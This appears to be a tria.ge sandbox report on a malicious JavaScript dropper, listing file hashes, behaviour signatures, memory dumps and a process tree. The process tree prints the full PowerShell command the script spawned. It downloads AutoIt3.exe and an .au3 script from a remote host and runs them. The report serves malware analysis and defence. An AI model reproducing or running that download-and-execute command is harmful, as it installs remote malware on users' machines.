Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

02112023_0...tle.js

windows7-x64

3

02112023_0...tle.js

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    01/11/2023, 18:38 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02112023_0238_gentle.js

  • Size

    135KB

  • MD5

    77ee5081c5c481378ed54009f53173c6

  • SHA1

    d70867e9e78247eebd54f54516ac8a046368d3f2

  • SHA256

    c953d07e2917511b5d9111da517ae28c3f4f07e84c1cfde09e1e69bb60299b0e

  • SHA512

    697421ef3ccdd66e1c94a2c388da6ee68e9d501ee841d2eb53254b4784715475057d2b05740e760cb6bdcfead10174101db9e5569f3cb44db5525d5291cbb9b0

  • SSDEEP

    1536:hZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0c:UT9U7hgaX6eerjqlI2IO6Mzqfpu

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\02112023_0238_gentle.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://shsukadadyuikmmonk.com:2351/msikrxeiths' -OutFile 'krxeiths.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'krxeiths.au3'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2188

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2188-6-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2188-5-0x0000000001E30000-0x0000000001E38000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2188-4-0x000000001B460000-0x000000001B742000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2188-7-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2188-8-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2188-9-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2188-10-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2188-11-0x0000000002AB0000-0x0000000002B30000-memory.dmp

    Filesize

    512KB

    Download

  • memory/2188-12-0x000007FEF5160000-0x000007FEF5AFD000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.